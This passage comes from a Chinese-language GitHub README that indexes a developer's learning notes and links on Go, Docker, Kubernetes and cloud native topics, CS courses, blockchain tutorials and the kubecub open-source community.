[่ทจๅนณๅฐไปฅๅŠๅคšๆžถๆž„็ผ–่ฏ‘่ฎพ่ฎก](https://nsddd.top/zh/posts/cross-platform-compilation/) - [Kubernetesไธ€็ฏ‡ๅฟซ้€Ÿๅ…ฅ้—จ็š„ๆ–‡็ซ ](https://nsddd.top/zh/posts/kubernetes-an-article-to-get-started-quickly/) - [ๅ‚ไธŽๆˆ‘ไปฌ็š„ๅŒบๅ—้“พๅญฆไน ๅนณๅฐ้กน็›ฎ](https://nsddd.top/zh/posts/participating-in-this-project/) <!-- My-Blog:END --> </details> </hr> <br> #### ็ŸฅไนŽไธ“ๆ  ๐Ÿฅฐ ่ฎข้˜…ไบ†ๆˆ‘็š„ [็ŸฅไนŽ่ดฆๆˆท](https://www.zhihu.com/people/3293172751) ้‡Œ้ข็š„ [ไบ‘ๅŽŸ็”Ÿ็ฒพ้€‰ๆ–‡็ซ ไธ“ๆ ](https://www.zhihu.com/column/c_1496496113348206594)ใ€‚ </br> <details><summary><b>๐Ÿ“š ๆˆ‘็š„็ŸฅไนŽๆ–‡็ซ ่ฎข้˜…๏ผˆๆฏๅ‘จๆ›ดๆ–ฐโ—๏ผ‰</b></summary> </br> ๐Ÿ”ฅ ็ŸฅไนŽไธ“ๆ <b>ๆฏไธชๅทฅไฝœๆ—ฅ11๏ผš59่‡ชๅŠจๆ›ดๆ–ฐไธ€ๆฌก๏ผˆactions้ƒจ็ฝฒ๏ผ‰</b> ๏ผŒๅ–œๆฌขๆ–‡็ซ ๅ…ณๆณจ็‚น่ตž๐Ÿ‘ๅ™ข~ <!-- ZHIHU:START --> - [ไบ‘ๅŽŸ็”Ÿ้ข†ๅŸŸไธญGitHubๅผ€ๆบGo้กน็›ฎ็š„่‡ชๅŠจๅŒ–ๆต‹่ฏ•ๅฎž่ทตไธŽ็ญ–็•ฅ](https://zhuanlan.zhihu.com/p/664338584) - [OpenIM ไฝฟ็”จ Harbor ๆญๅปบไผไธš็บง้•œๅƒไป“ๅบ“](https://zhuanlan.zhihu.com/p/662935033) - [OpenIM ๅคš่ฟ›็จ‹็ฎก็†็ญ–็•ฅ](https://zhuanlan.zhihu.com/p/652047787) - [OpenIM ็ฆป็บฟ้ƒจ็ฝฒ](https://zhuanlan.zhihu.com/p/651917752) - [git cherry-pick cource](https://zhuanlan.zhihu.com/p/649283181) - [DevOps OpenIM ็š„ๆ ‡ๅ‡†่ฎพ่ฎก](https://zhuanlan.zhihu.com/p/648188241) - [GO Gorelease](https://zhuanlan.zhihu.com/p/648187762) - [OpenIM standardization](https://zhuanlan.zhihu.com/p/645182674) - [ไธ€็ฏ‡ๅญฆไผš github actions](https://zhuanlan.zhihu.com/p/643085910) - [kubecub - ๅธฎๅŠฉ่Œๆ–ฐๆ‰“้€ ๅผ€ๆบ้กน็›ฎ](https://zhuanlan.zhihu.com/p/634020346) - [go ่ฏญ่จ€ๅทฅๅ…ทๅŒ…](https://zhuanlan.zhihu.com/p/631662028) - [K8s ๆทฑๅ…ฅ็†่งฃ Operator-client ่ฏฆ่งฃ](https://zhuanlan.zhihu.com/p/629622839) - [Kubernetes ็คพๅŒบ่ง„่Œƒ](https://zhuanlan.zhihu.com/p/629622183) - [้ซ˜็บง็š„ Githook ่ฎพ่ฎก](https://zhuanlan.zhihu.com/p/629617458) - [CloudNative / Kubernetes ๅญฆไน ่ต„ๆบๆ•ด็†](https://zhuanlan.zhihu.com/p/614921043) - [Istio ้ซ˜็บงๆต้‡็ฎก็†](https://zhuanlan.zhihu.com/p/614775174) - [Kubernetes ๆฆ‚ๅฟตไปฅๅŠๆžถๆž„](https://zhuanlan.zhihu.com/p/611169064) - [ๆทฑๅ…ฅๅ‰–ๆž Docker ๅบ•ๅฑ‚๏ผˆๅ…จ๏ผ‰](https://zhuanlan.zhihu.com/p/610939386) - [Go ่ฏญ่จ€็š„ Makefile ๆŒ‡ๅ—](https://zhuanlan.zhihu.com/p/607940899) - [Go่ฏญ่จ€้กน็›ฎ่ฎพ่ฎกๅ’Œๅผ€ๅ‘ๆต็จ‹](https://zhuanlan.zhihu.com/p/607192022) <!-- ZHIHU:END --> </details> </hr> <br> ## ๐Ÿ“– Go่ฏญ่จ€ #### ๐Ÿท๏ธๅ‰่จ€ `Go`่ฏญ่จ€็š„ๅญฆไน ๅ‚่€ƒๅฎ˜็ฝ‘ๆ–‡ๆกฃ[go่ฏญ่จ€ๅฎ˜ๆ–น็ผ–็จ‹ๆŒ‡ๅ—](https://golang.org/#)๏ผŒๅฆ‚ไฝ•ๆ‰พๅˆฐๅˆ้€‚็š„Go่ฏญ่จ€ๅญฆไน ่ทฏ็บฟ[Go่ฏญ่จ€่ทฏ็บฟ](go-advancend/go_route.md)๏ผˆ๐ŸŽˆ ๅซๆœ‰ๅคง้‡็š„Go่ฏญ่จ€้กน็›ฎ่ต„ๆบใ€็บฟไธŠ่ต„ๆบๆ”ถ้›†๏ผ‰ใ€‚ ```mermaid graph LR ็จ‹ๅบๅ‘˜ๅŸบๆœฌ็ด ๅ…ป ==> GoๅŸบ็ก€็ฏ‡ ==>ๅผ€ๅ‘ๅฟ…ๅค‡ๆŠ€ๆœฏ ==> Go่ฟ›้˜ถ100็ฏ‡ ==> Go้ซ˜็บง็ฏ‡็ซ  ``` + ๐Ÿ”ฑ[go่ฏญ่จ€ๅฎ˜ๆ–น็ผ–็จ‹ๆŒ‡ๅ—](https://golang.org/#) + ๐Ÿšง[Go่ฏญ่จ€่ทฏ็บฟๅ’Œ่ต„ๆบๅพ้›†(update 2023)](go-advancend/go_route.md) #### ๐Ÿ”–ๆ ธๅฟƒ **Go่ฏญ่จ€็š„ๆ ธๅฟƒ็ผ–็จ‹็ฏ‡๏ผŒๅŸบ็ก€้ƒจๅˆ†30ๅคฉ่ฎฐๅฝ•๏ผŒ100็ฏ‡่ฟ›้˜ถ๏ผŒ้ซ˜็บง็ฏ‡ๅŒ…ๆ‹ฌGo่ฏญ่จ€ๅบ•ๅฑ‚็š„ๅฎž็Žฐ๏ผŒruntimeใ€่ฐƒๅบฆๅ™จ็š„ๅŽŸ็†ไปฅๅŠGo่ฏญ่จ€่ฎพ่ฎกๆจกๅผ~** โš ๏ธ ็›ฎๅ‰ๅทฒๅ…จ้ƒจ่ฟ็งป่‡ณ โžก๏ธ [CubDoc๐Ÿงท](https://go.nsddd.top/) + [x] [๐Ÿ–ฑ๏ธGO ๅŸบ็ก€้ƒจๅˆ†๐Ÿ”ฅ](awesome-golang/README.md) + [x] [๐Ÿ–ฑ๏ธGo่ฏญ่จ€100็ฏ‡่ฟ›้˜ถ๐Ÿ”ฅ](awesome-golang/Gomd_super/README.md) + [x] [๐Ÿ–ฑ๏ธGo ้ซ˜็บง็ฏ‡](awesome-golang/go-advancend/README.md) + [ ] [๐Ÿ–ฑ๏ธMit 6.824 ็ฌ”่ฎฐ](awesome-golang/mit-6-824/README.md) #### ๐Ÿ“่กฅๅ…… ๅญฆไน ๅผ€ๆบ้กน็›ฎๅฏนไบŽๆˆ‘ไปฌ็š„ๆˆ้•ฟ้žๅธธๅคง๏ผŒๆˆ‘็ป“ๅˆๆˆ‘่‡ชๅทฑ็š„ๅผ€ๆบ็ปๅŽ†ๅ†™ไบ†[่ฟ™็ฏ‡๐ŸŽฏๅผ€ๆบไน‹่ทฏ๏ผš่ทจ่ถŠๅ…ซไธช้˜ถๆฎต๏ผŒๆˆๅฐฑ่กŒไธšไฝผไฝผ่€…](https://nsddd.notion.site/f8854a0f60d346d98b9eb2ccb6eaef8f)ใ€‚ๅŒ[๐Ÿง‹ ๅญฆไน  Kubernetes ็š„ๆˆ้•ฟ่ฝจ่ฟน](https://nsddd.notion.site/CloudNative-Kubernetes-2f278e98ed274999829333272415c72d)ไธ€ๆ ท๏ผŒ่ฟ™็ฏ‡ๆ–‡็ซ ๅฐ†ไผš้•ฟๆœŸๆ›ดๆ–ฐ๏ผŒไนŸๅฏไปฅๅ‚ไธŽ่ดก็Œฎ ๏ผŒ่กฅๅ…จๆ›ดๆ–ฐ~ใ€‚[k8s-iam](https://github.com/cubxxw/k8s-iam) ้กน็›ฎๅฐฑๆ˜ฏๆˆ‘็ป“ๅˆKubernetes ๅ’Œ iam ่ฟ™ไธคไธชๆžไธบไผ˜็ง€็š„้กน็›ฎ่”ๅˆๆ‰“้€ ็š„k8s-iam ้กน็›ฎ๏ผŒๅฏน [ไผไธš็บง iam ้กน็›ฎ](https://github.com/marmotedu/iam/) ่ฟ›่กŒๅญฆไน ๅ’Œไปฟๅ†™๏ผŒไปฅๅŠๅฏนๅผ€ๆบๆ–‡ๆกฃๅ’ŒๆŠ€ๆœฏ็ป†่Š‚็š„่พ“ๅ‡บใ€‚iam ๆŠ€ๆœฏๆ ˆๆถต็›–ไบ†ๅผ€ๅ‘็Žฏๅขƒ้…็ฝฎใ€ไปฃ็ ่ฎพ่ฎกใ€ๅธธ็”จๅŒ…ไฝฟ็”จใ€HTTPใ€ๅฎขๆˆท็ซฏCLIใ€RESTful่ฎพ่ฎกใ€ๆ•ฐๆฎๅบ“ๆ“ไฝœใ€Swaggerๆ–‡ๆกฃใ€Cacheๆœบๅˆถใ€ไธšๅŠก้€ป่พ‘ๅค„็†ใ€ๅผ€ๅ‘่ง„่Œƒใ€API่ฐƒ่ฏ•ใ€้ƒจ็ฝฒๆ–นๅผๅ’Œไบ‘ๅŽŸ็”Ÿๆžถๆž„่ฎพ่ฎก็ญ‰ๆ–น้ขใ€‚ๆœ‰ๅ…ด่ถฃ็š„ๅฏไปฅไธ€่ตท้˜…่ฏปๅญฆไน ใ€‚ ๐Ÿฅ‡ ๅ‘ฝๅ่ง„่ŒƒไปฅๅŠ้กน็›ฎ็›ฎๅฝ•็ป“ๆž„๐Ÿ“‡็š„่ฎพๅฎšๅฏนไบŽไธ€ๅๅˆๆ ผ็š„ๅทฅ็จ‹ๅธˆๆฅ่ฏดไนŸๆ˜ฏ้žๅธธ้‡่ฆ็š„ใ€‚ไธ‹้ขๆ˜ฏไฝœไธบไธ€ๅๅˆๆ ผ็š„ๅผ€ๅ‘่€…๐Ÿคต๏ผŒๅฟ…้กป่ฆไผš็š„ๅŸบๆœฌ็ด ๅ…ปใ€‚ + [๐Ÿ–ฑ๏ธGo่ฏญ่จ€ๅŒ…็ฎก็†ๅทฅๅ…ท โ€” modๅŒ…](Gomd_super/mod.md) + [๐Ÿ–ฑ๏ธGo-airๅฎž็Žฐ็ƒญๅŠ ่ฝฝ็ผ–่ฏ‘](Gomd_super/go-air.md) + [๐Ÿ–ฑ๏ธๅ‘ฝๅ่ง„ๅˆ™ๅ’Œไปฃ็ ่ง„่Œƒ](Gomd_super/name.md) + ๐Ÿ–ฑ๏ธ[Go่ฏญ่จ€็›ฎๅฝ•็ป“ๆž„](Gomd_super/catalogue.md) + ๐Ÿ–ฑ๏ธ[Goๆ–‡ไปถไปฅๅŠ็ผ–็ ๅค„็†](Gomd_super/go_file.md) + ๐Ÿ–ฑ๏ธ[ๆญฃๅˆ™่กจ่พพๅผ](Gomd_super/zhenze.md) + ๐Ÿ–ฑ๏ธ[ไฝ่ฟ็ฎ—ๆŠ€ๅทง](Gomd_super/bitwise.md) > Go่ฏญ่จ€ไธ€ไบ›ๅ…ถไป–็š„็ฝ‘็ซ™ๅ’Œๅšๅฎข๏ผŒๅ€ผๅพ—ไธ€็œ‹ > > + [Go่ฏญ่จ€้ข่ฏ•้ข˜](https://www.topgoer.cn/docs/gomianshiti/mianshiti) > + [Go่ฏญ่จ€ไธญๆ–‡ๅฎ˜ๆ–นๆ–‡ๆกฃ](http://word.topgoer.com/) > + [Go่ฏญ่จ€ไธ“ๅฎถ็ผ–็จ‹ๅœฐๅ€](http://wen.topgoer.com/docs/gozhuanjia/gogfjhk) <br> ## ๐Ÿ‘€ ไบ‘ๅŽŸ็”Ÿ Cloud Native ๐Ÿ’ก ่ฟ™ๆ˜ฏไธ€ไธชๅ…ณไบŽไบ‘ๅŽŸ็”Ÿ้ข†ๅŸŸ็š„ไป“ๅบ“๏ผŒๆถ‰ๅŠๅˆฐ dockerใ€Kubernetesใ€cloud native ็Ÿฅ่ฏ†๏ผŒๅŒ…ๆ‹ฌ docker ๆžถๆž„ๅ’Œๅบ•ๅฑ‚ๅฎž็Žฐ๏ผŒๅŒ…ๆ‹ฌKubernetes็š„ๆžถๆž„ใ€ๅŽŸ็†ใ€็”Ÿๆ€ไปฅๅŠๆบ็ ้˜…่ฏปใ€‚่ฟ˜ๆœ‰ Cloud Native ๅ…ถไป–้ข†ๅŸŸ็Ÿฅ่ฏ†๏ผŒไปฅๅŠๅ„ไธช CNCF ๅผ€ๆบ็คพๅŒบ้กน็›ฎๅญฆไน ใ€‚ + [x] [docker](awesome-docker-kubernetes/README.md) + [x] [Kubernetes](awesome-docker-kubernetes/Cloud-Native-k8s/README.md) + [x] [CloudNative](awesome-docker-kubernetes/Cloud-Native/README.md) ## ๐Ÿ“š CS็ณปๅˆ— CS ็ณปๅˆ—้€‰่‡ช[๐ŸŽ‰awesome-cs-course](https://github.com/cubxxw/awesome-cs-course)๏ผŒๅ†…ๅฎนๆถต็›– ่ฎก็ฎ—ๆœบๆ“ไฝœ็ณป็ปŸใ€csapp็ณปๅˆ—ใ€็ฎ—ๆณ•ๅ’Œๆ•ฐๆฎ็ป“ๆž„ใ€่ฎก็ฎ—ๆœบ็ฝ‘็ปœใ€`linux`ใ€`java`ใ€`python`ใ€`C/C++`ใ€`vuepress`ใ€`gitbook`ใ€`nodejs`ใ€`vuejs`ใ€`halo`ใ€`redis`ใ€`hugo`ใ€`nginx`ใ€`nosql`ใ€`mysql`ใ€`JavaScript`ใ€`git`ใ€`markdown`ใ€`web`ๅ‰็ซฏ็ญ‰็ฌ”่ฎฐ๏ผŒๆ›ดๅคš็งปๆญฅๅˆฐ[AWESOME็ณปๅˆ—CSไป“ๅบ“ๅœฐๅ€](https://github.com/cubxxw/awesome-cs-course/) + [x] [Javaๅ…จๅ†Œโ˜•](https://github.com/cubxxw/awesome-cs-course/blob/master/java/README.md) + [x] [ๆฑ‡็ผ–ๅญฆไน ๐Ÿ”ฅ](ๆฑ‡็ผ–/README.md) + [x] [่ฝฏไปถๅทฅ็จ‹](./่ฝฏไปถๅทฅ็จ‹&็ณป็ปŸ่ฎพ่ฎกๅ’Œๆžถๆž„/README.md) + [x] [็ฎ—ๆณ•ไธŽๆ•ฐๆฎ็ป“ๆž„๏ผˆLeetCodeๅˆท้ข˜่ฎฐๅฝ•๏ผ‰](https://github.com/cubxxw/LeetCode/) + [x] [่ฎก็ฎ—ๆœบ็ฝ‘็ปœ๐Ÿ”ฅ](./web/README.md) + [x] [ๆ“ไฝœ็ณป็ปŸ โ€” OS๐Ÿ”ฅ](https://github.com/cubxxw/os) + [x] [CSๅฟ…้กป่ฆไผš็š„ๆŠ€ๆœฏ๐Ÿ”ฅ](cs/README.md) <br> ## ๐Ÿ“˜ ๅผ€ๅ‘ๅฟ…ๅค‡ๆŠ€ๆœฏ ๐Ÿง‹ๅ‚ไธŽๆ™ฎ้€š็จ‹ๅบ็š„ๅผ€ๅ‘ๆˆ–่€…ๆ˜ฏๅŒบๅ—้“พโ›“๏ธๅผ€ๅ‘ๅฟ…้กป[็†Ÿๆ‚‰LinuxๆŒ‡ไปค](https://github.com/cubxxw/awesome-cs-course/blob/master/linux/README.md)๏ผŒ็†Ÿๆ‚‰[gitๅ›ข้˜Ÿๅผ€ๅ‘](https://github.com/cubxxw/awesome-cs-course/blob/master/Git/README.md)๏ผŒๅŸบไบŽ[dockerๅฎนๅ™จ](docker/README.md)ไผš่ฎฉๆˆ‘้—จๅฟซ้€Ÿ็š„ๆญๅปบๅทฅๅ…ทๅ’Œ็Žฏๅขƒ๏ผŒๆ›ดๅฅฝ็š„่ฟ็งปๅผ€ๅ‘็Žฏๅขƒๅ’Œ่ฟ็งป้“พ็ ๏ผˆblockcode)๏ผŒ[ๅฏ†็ ๅญฆๅ’Œไฟกๆฏๅฎ‰ๅ…จ](cryptology/README.md)ไธไป…ไป…ๆ˜ฏๅŒบๅ—้“พๅทฅ็จ‹ๅธˆๅฟ…้กป่ฆๅญฆไน ็š„ๆŠ€ๆœฏ๏ผŒๆ›ดๆ˜ฏITไปŽไธš่€…ๆœชๆฅไธๅฏๆˆ–็ผบ็š„ๆŠ€ๆœฏใ€‚ๆˆ‘ไปฌ้ƒฝๆธดๆœ›็ณป็ปŸ่ƒฝๆ›ดๅŠ ็š„ๅฎ‰ๅ…จไธๆ˜ฏๅ—๐Ÿ“ตใ€‚ โš ๏ธ `Docker` ใ€`K8s`ใ€`sealos`ใ€`ไบ‘ๅŽŸ็”Ÿ` ๅทฒๅ…จ้ƒจ่ฟ็งป่‡ณ โžก๏ธ [CubDoc๐Ÿงท](https://docker.nsddd.top/) + [x] ๐Ÿ–ฑ๏ธ [linuxไปŽๅ…ฅ้—จๅˆฐ็ฒพ้€š๐Ÿ”ฅ](https://github.com/cubxxw/awesome-cs-course/blob/master/linux/README.md) + [x] ๐Ÿ–ฑ๏ธ [Gitโ€”ๅฟ…ๅค‡็ฅžๅ™จ๐Ÿ”ฅ](https://github.com/cubxxw/awesome-cs-course/blob/master/Git/README.md) + [x] [๐Ÿ–ฑ๏ธ Docker/k8s/ไบ‘ๅŽŸ็”Ÿ๐Ÿ”ฅ](docker/README.md) + [x] [๐Ÿ–ฑ๏ธ ๅฏ†็ ๅญฆๅ’Œไฟกๆฏๅฎ‰ๅ…จ๐Ÿ”ฅ](cryptology/README.md) <br> ## ๐Ÿ“” ๅŒบๅ—้“พๅฏผ่ˆช <font size = 2>ๆˆ‘่ฎคไธบไธ–็•ŒๅŽ†ๅฒๅฏไปฅ็”จไธคๅฅ่ฏๆฅๆ่ฟฐ๏ผšๅˆ†ไน…ๅฟ…ๅˆ๏ผŒๅˆไน…ๅฟ…ๅˆ†ใ€‚ๅŒบๅ—้“พๅฐ†ๆ˜ฏๅ‚ฌๅŒ–ไธ‹ไธ€ไธชโ€˜ๅˆไน…ๅฟ…ๅˆ†โ€™ๆ—ถไปฃ็š„ๆ–ฐๆŠ€ๆœฏใ€‚ๅŒบๅ—้“พ็š„ไบง็”Ÿ้“ธๅฐฑไบ†ไธ€ไธชๆ–ฐ็š„ๆ—ถไปฃ๏ผŒๆˆ‘ไปฌ็š„ไฟกๅฟตๆ˜ฏๅปบ็ญ‘ๅœจไธ€ไธชๆ•ฐๅญฆ็š„็ฎ—ๆณ•ไธŠ้ข๏ผŒIn math we trustใ€‚ โ€”โ€”ๅผ ้ฆ–ๆ™Ÿ</font> :spider_web: ่ฟ™ๆ˜ฏไธ€ไธชweb2็š„ไธ–็•Œ๏ผŒๆˆ–่€…ๅพˆๅฟซๆ•ดไธชไบ’่”็ฝ‘่กŒไธš้ƒฝไผšๆ”น้ฉ๏ผŒๆ˜ฏ็š„๏ผŒ้ƒฝไผš่ฟˆๅ…ฅweb3็š„ไธ–็•Œ > ๐Ÿ”ฅ ๆˆ‘ๆทฑไปฅไธบ็„ถ๏ผšๅŒบๅ—้“พๆˆ–่ฎธไธ่ƒฝ่ฎฉ่ฟ™ไธชไธ–็•Œๅˆ†ๅธƒๅŒ–๏ผŒไฝ†ๆ˜ฏๅฎƒๅฏไปฅ่ฎฉไธ–็•Œไธๅ†ๆœ‰ไธญไป‹ใ€‚ไธๅœจไผšๅ› ไธบไฝ ๆ‰€็Žฉๆธธๆˆๅดฉๆบƒไฝ ๅฐฑๅคฑๅŽปไบ†่ฟ™ไธชๆธธๆˆ~ ไปŽไบ‹ๅŒบๅ—้“พ๏ผŒ้œ€่ฆๅ“ชไบ›ๅŸบ็ก€็Ÿฅ่ฏ†๏ผŒ็œ‹ไธ‹[ๅŒบๅ—้“พๅผ€ๅ‘้œ€่ฆไป€ไนˆ](C_Universal_Brockchain\chain.md) ๏ผŒไฝ ้œ€่ฆไธ€ไปฝ[ๅŒบๅ—้“พๅทฅ็จ‹ๅธˆ่ทฏ็บฟ](./blockchain/route.md)๏ผŒๆˆ–่ฎธไฝ ๅฏไปฅๅœจไธ€ไบ›ๅŒบๅ—้“พ้กน็›ฎไธญๆ‰พๅˆฐ็ตๆ„Ÿ[๐Ÿ”—ๅŒบๅ—้“พๅ…ฌ็›Š้กน็›ฎ๏ผˆNFT+็ง้“พ/่”็›Ÿ้“พ/็ง้“พ๏ผ‰](blockchain/ๅŒบๅ—้“พๅ…ฌ็›Š้กน็›ฎ/README.md)ใ€‚ๅŒบๅ—้“พ็š„[ๅ…ฑ่ฏ†็ฎ—ๆณ•](blockchain/README.md)ๆ˜ฏๆ€Žไนˆๅฎž็Žฐ็š„ๅ‘ข? + [x] [๐Ÿ”—ๅŒบๅ—้“พๅทฅ็จ‹ๅธˆ่ทฏ็บฟ](./blockchain/route.md) + [x] [๐Ÿ”—ๅŒบๅ—้“พๅผ€ๅ‘้œ€่ฆไป€ไนˆโ“](C_Universal_Brockchain\chain.md) + [x] [๐Ÿ”—ๅŒบๅ—้“พๅ…ฌ็›Š้กน็›ฎ๏ผˆNFT+็ง้“พ/่”็›Ÿ้“พ/็ง้“พ๏ผ‰](blockchain/ๅŒบๅ—้“พๅ…ฌ็›Š้กน็›ฎ/README.md) + [x] [๐Ÿ”—ๅ…ฑ่ฏ†็ฎ—ๆณ•โ€”โ€”Go่ฏญ่จ€ๅฎž็Žฐ](./blockchain/README.md) <br> ## :b: ๅŒบๅ—้“พๆ•™็จ‹ ๐Ÿ’ฑ ๅŒบๅ—้“พ็ณปๅˆ—ๅŒ…ๅซไบ†ๅŒบๅ—้“พๆ•™็จ‹๏ผŒไธป่ฆๆ˜ฏ`eth`ใ€`btc`่ฟ˜ๆœ‰่”็›Ÿ้“พ`fabric`่ถ…็บง่ดฆๆœฌ็ป„็ป‡็š„ๆ•™็จ‹๏ผŒๅŸบไบŽ่ฟ™ไบ›ๆ•™็จ‹ๆ‰ฉๅฑ•ๆ–ฐ็š„ๆŠ€ๆœฏ๏ผš`git`ใ€`ipfs`ใ€ๅฏ†็ ๅญฆใ€ๅ…ฑ่ฏ†็ฎ—ๆณ•ใ€‚ ๐Ÿ“ฎ ่ฟ™ไธชไนŸๆ˜ฏๆˆ‘ไปฌ`C-UB`็คพๅŒบ็š„ๆœ€็ปˆ็›ฎ็š„๏ผŒๆˆ‘ไปฌ่ฆๆ‰“้€ ๅ‡บไธ€ไธชไธไธ€ๆ ท็š„ๅ…จๆฐ‘ๅญฆไน ๅนณๅฐ๏ผŒๅฐ†ไผš่žๅˆไธ€ๅˆ‡ๆ–ฐๅž‹ๆŠ€ๆœฏ๏ผˆ`ipfs`ใ€`git`ใ€`k8s`ใ€`Kafka`)๏ผŒๅŸบไบŽweb3็š„c-ub็คพๅŒบ๏ผŒๅฑžไบŽๆˆ‘ไปฌๆฏไธ€ไธชไบบ๏ผๆˆ–่ฎธ่ฟ™ๅฐ†ไผšๆœ‰่ƒฝๅŠ›ๆˆไธบไธ‹ไธ€ไธชๆ—ถไปฃ็š„ๅ…ˆ้ฉฑ๏ผŒๅฎŒๅ…จๆ”นๅ˜ไบบ็ฑป็š„ๅๅŒๆ–นๅผใ€‚ๅฝ“ไบบไธŽไบบไน‹้—ดๆ›ดไฟกไปป๏ผŒๆ•ˆ็Ž‡ๅฐฑไผšๆ›ด้ซ˜ใ€‚ ๐Ÿšธ ไปฅๅŠ้“พๅญฆ้กน็›ฎ[C-Universal Blockchain](https://github.com/c-ub) > ไปฅๅคชๅŠๅ’Œๆฏ”็‰นๅธไธ€ๆ ท๏ผŒๅบ•ๅฑ‚ๆก†ๆžถ้ƒฝๆ˜ฏๅŒบๅ—้“พๅ่ฎฎ๏ผŒๅŒบๅ—้“พๆœฌ่ดจไธŠๆ˜ฏไธ€ไธชๅบ”็”จไบ†ๅฏ†็ ๅญฆๆŠ€ๆœฏ็š„ๅˆ†ๅธƒๅผๆ•ฐๆฎๅบ“็ณป็ปŸใ€‚ๅปบ่ฎฎ็œ‹ไธ€ไธ‹ **[ไปฅๅคชๅŠ็™ฝ็šฎไนฆ](https://github.com/ethereum/wiki/wiki/%5B%E4%B8%AD%E6%96%87%5D-%E4%BB%A5%E5%A4%AA%E5%9D%8A%E7%99%BD%E7%9A%AE%E4%B9%A6)๏ผˆ้œ€่ฆๆœ‰golang็ผ–็จ‹ๅŸบ็ก€๏ผ‰** > > <div align="center"> > <a href="eth/TOC.md"> > <img src="https://sm.nsddd.top//typora/image-20220630192622583.png?mail:3293172751@qq.com" alt="ๅŒบๅ—้“พ็š„ๅญฆไน " style="zoom: 20%;" /> > </a></div> + [x] [๐Ÿ–ฑ๏ธๅŒบๅ—้“พๆ•™็จ‹๐Ÿ”ฅ](C_Universal_Brockchain/README.md) + [x] [๐Ÿ–ฑ๏ธweb3๏ผŒๆ™บ่ƒฝๅˆ็บฆ](eth/README.md) + [x] [๐Ÿ–ฑ๏ธๅŒบๅ—้“พๆŠ€ๆœฏๆŒ‡ๅ—](chainbrock-learning/SUMMARY.md) > ไผไธš็บง[ๅŒบๅ—้“พๅฎžๆˆ˜ๆ•™็จ‹](https://learnblockchain.cn/books/enterprise/) <br> <!-- ## AI ๆ•™็จ‹ --> ## ๐Ÿ—ƒ๏ธ ้กน็›ฎ ไธบไบ†ๆ–นไพฟ็ฎก็†๏ผŒๆˆ‘ๅฐ†ๆ‰€ๆœ‰็š„็Ÿฅ่ฏ†ไป“ๅบ“ไปฅๅŠ่ดก็Œฎๅผ€ๆบ้กน็›ฎๆ‰€ๅ…‹้š†็š„ไป“ๅบ“ๆ”พๅœจไบ†ๆˆ‘็š„ไธชไบบ่ดฆๆˆท [cubxxw](https://github.com) ไธญ๏ผŒๅฐ†ๆ‰€ๆœ‰็š„้กน็›ฎๅ’Œ่ง„่Œƒๆœ‰ๅ…ณ็š„ไป“ๅบ“้ƒฝๆ”พๅœจไบ†่‡ชๅทฑๅˆ›ๅปบ็š„็คพๅŒบ [kubecub](https://github.com/kubecub) ไธญๆ–นไพฟๆ‰€ๆœ‰ไบบๅŠ ๅ…ฅๅนถไธ”ๅญฆไน ๏ผŒๅนถไธ”ๅฐ†ๆ‰€ๆœ‰่‡ชๅŠจๅŒ–็›ธๅ…ณ็š„่ดฆๆˆท้ƒฝไฝฟ็”จไบ† [robot(kubbot)](https://github.com/kubbot) ๆœบๅ™จไบบๆฅ่ฟ›่กŒ่‡ชๅŠจๅŒ–ๅ’ŒๆŽงๅˆถใ€‚ ๆˆ‘ๅ‚ไธŽ่ฟ‡ๅพˆๅคš้กถ็บงๅผ€ๆบ็คพๅŒบ๏ผŒๅŒ…ๆ‹ฌ [sealer](https://github.com/sealerio/sealer)ใ€[sealos](https://github.com/labring/sealos)ใ€[Kubernetes](https://github.com/kubernetes/kubernetes/)ใ€[OpenIM](https://github.com/OpenIMSDK)ใ€[K8sgpt](https://github.com/k8sgpt-ai/k8sgpt)ใ€[Horizon](https://github.com/horizoncd/horizon/) ไปฅๅŠ ๆˆ‘่‡ชๅทฑๆ‰“้€ ็š„ ๅผ€ๆบ็คพๅŒบ [Kubecub](https://github.com/kubecub)ใ€‚kubecub ไธญๆœ‰ๅพˆๅคšๆˆ‘ๆฒ‰ๆท€ไธ‹ๆฅ็š„ๅผ€ๆบ่ง„่ŒƒไปฅๅŠไปฃ็ ใ€้กน็›ฎ่ง„่Œƒ้ƒฝๆ€ป็ป“ๅœจๅ„ไธชไป“ๅบ“ไธญใ€‚ๅนถไธ”๏ผŒKubecub ๅ’Œ OpenIM ไฝฟ็”จไบ†ๆˆ‘ๅˆ›้€ ็š„ [๐Ÿค– robot(kubbot)](https://github.com/kubbot) ๆฅๅฏน PR ๅ’Œ Issue ้ซ˜ๅบฆ่‡ชๅŠจๅŒ–ใ€‚kubecub ๅฎ—ๆ—จๆ˜ฏ้ขๅ‘ๆ‰€ๆœ‰็š„ๅผ€ๅ‘่€…่ฟ›่กŒๅญฆไน ๅ’Œๅˆ›้€ ็š„๏ผŒไฝ ๅฏไปฅๅœจ้‡Œ้ขๅˆฉ็”จๆˆ‘ไปฌ็š„่‡ชๅŠจๅŒ–ๅทฅๅ…ทๅ’Œๆจกๆฟๆ‰“้€ ่‡ชๅทฑ็š„ๅผ€ๆบ้กน็›ฎ๏ผŒๅนถไธ”่ฎฉๆ›ดๅคš็š„ไบบๆฅๅธฎๅŠฉไฝ ๅๅŒใ€review ไปฃ็ ใ€‚ ๅœจ้‡Œ้ข็งฏ็ดฏไบ†ๅพˆๅคš็š„ๅผ€ๆบ็ป้ชŒ๏ผŒๅนถไธ”่ฎฐๅฝ•ๅœจๆˆ‘็š„ [ๅšๅฎข](https://nsddd.top) ไธญ๏ผŒๅ…ถไธญ๏ผŒๅพˆๅคš็š„ๆๆกˆๅ’Œๅœจ่ดก็Œฎ็š„ๆˆ้•ฟ็ฌ”่ฎฐ๏ผŒๆ‰€ๅญฆไน ๅˆฐ็š„็Ÿฅ่ฏ†้ƒฝๅœจ [CloudNative](https://docker.nsddd.top/Cloud-Native/) ่ฟ™็ฏ‡็Ÿฅ่ฏ†ๅบ“ไธญๆœ‰ๆ‰€่ฎฐๅฝ•ใ€‚ > <p align = "center" color="red"> > <b> kubecub๏ผˆkubecub-ๅผ€ๆบ็คพๅŒบ๏ผ‰</b> > </p> > > <div align="center"> > <a href="https://github.com/kubecub"> > <img src="http://sm.nsddd.top/sm202305242215086.png" alt="twitter_header_photo_1" style="zoom: 20%;" /> > </a></div> > > ๆฌข่ฟŽๅŠ ๅ…ฅ kubecub ็คพๅŒบไธ€่ตทๅญฆไน ใ€ไธบๅผ€ๆบๅš่ดก็Œฎ ! 